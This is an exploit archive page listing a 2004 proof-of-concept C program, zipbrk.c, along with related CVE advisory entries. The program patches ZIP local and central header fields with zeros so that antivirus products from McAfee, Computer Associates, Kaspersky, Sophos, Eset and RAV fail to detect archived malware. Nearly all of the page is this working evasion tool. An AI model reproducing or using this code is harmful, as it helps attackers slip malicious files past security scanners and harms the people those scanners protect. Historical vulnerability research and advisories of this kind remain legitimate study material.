Multiple AntiVirus (zip file) Detection Bypass Exploit

🗓️ 16 Jul 2008 00:00:00Reported by RootType

Proof-of-Concept for ZIP File Vulnerabilities

Reporter	Title	Published	Views	Family All 27
0day.today	Multiple AntiVirus (zip file) Detection Bypass Exploit	14 Nov 200400:00	–	zdt
Circl	CVE-2004-0935	10 Mar 202603:00	–	circl
Check Point Advisories	McAfee AntiVirus ZIP Archive Virus Detection Bypass attack - Ver2 (CVE-2004-0932)	28 Dec 201400:00	–	checkpoint_advisories
CVE	CVE-2004-0932	19 Nov 200405:00	–	cve
CVE	CVE-2004-0933	19 Nov 200405:00	–	cve
CVE	CVE-2004-0934	19 Nov 200405:00	–	cve
CVE	CVE-2004-0935	19 Nov 200405:00	–	cve
CVE	CVE-2004-0936	19 Nov 200405:00	–	cve
CVE	CVE-2004-0937	19 Nov 200405:00	–	cve
Cvelist	CVE-2004-0932	19 Nov 200405:00	–	cvelist


                                                /*
zipbrk.c - Proof-of-Concept for CAN-2004-0932 - CAN-2004-0937
Copyright (C) 2004 oc.192

This program is free software; you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not,
write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

oc.192 phreaker net
*/
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

unsigned short LOCAL_HEADER_OFFSET = 16;
unsigned short CENTRAL_HEADER_OFFSET = 18;
unsigned long DATA_REPLACE_VALUE = 0x00000000;

void show_usage()
{
printf(&quot;zipbrk - by oc.192 [[email protected]]\n&quot;);
printf(&quot;Attempts to utilize the vulnerabilities described in:\n&quot;);
printf(&quot;CAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\n&quot;
&quot;CAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\n&quot;
&quot;CAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\n&quot;);
printf(&quot; Usage: zipbrk &lt;zip_file&gt;\n&quot;);
}

void patch_file(FILE *hfile, unsigned long offset)
{
char *buffer = malloc(1);

memset(buffer, 0, 1);
fseek(hfile, offset, SEEK_SET);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
free(buffer);
}

void scan_file(char *filename)
{
FILE *hfile;
unsigned char buffer;
unsigned long offset = 0;

if ((hfile = fopen(filename, &quot;rb+&quot;)) == NULL)
{
printf(&quot;[-] Error: Unable to open %s&quot;, filename);
return;
}
printf(&quot;[+] Scanning %s ...\n&quot;, filename);

while (fread(&amp;buffer, sizeof(buffer), 1, hfile))
{
if (buffer == 0x50)
{
fread(&amp;buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x4B)
{
fread(&amp;buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x01)
{
fread(&amp;buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x02)
{
/* perform write */
offset = ftell(hfile);
offset = offset + LOCAL_HEADER_OFFSET;
printf(&quot; [-] Writing local header patch [0x%.8X]\n&quot;, offset);
patch_file(hfile, offset);
fseek(hfile, offset, SEEK_SET);
}
}
else if (buffer == 0x03)
{
fread(&amp;buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x04)
{
/* perform write */
offset = ftell(hfile);
offset = offset + CENTRAL_HEADER_OFFSET;
printf(&quot; [-] Writing central header patch [0x%.8X]\n&quot;, offset);
patch_file(hfile, offset);
fseek(hfile, offset, SEEK_SET);
}
}
}
}
}
printf(&quot;[+] File scanning finished. EOF:%d ERR:%d\n&quot;, feof(hfile), ferror(hfile));
fclose(hfile);
}

int main(int argc, char *argv[])
{
if (argc != 2)
{
show_usage();
return 0;
}

if (!strcmp(argv[1], &quot;-h&quot;) || !strcmp(argv[1], &quot;/?&quot;))
{
show_usage();
return 0;
}

scan_file(argv[1]);

return 0;
}

16 Jul 2008 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.43585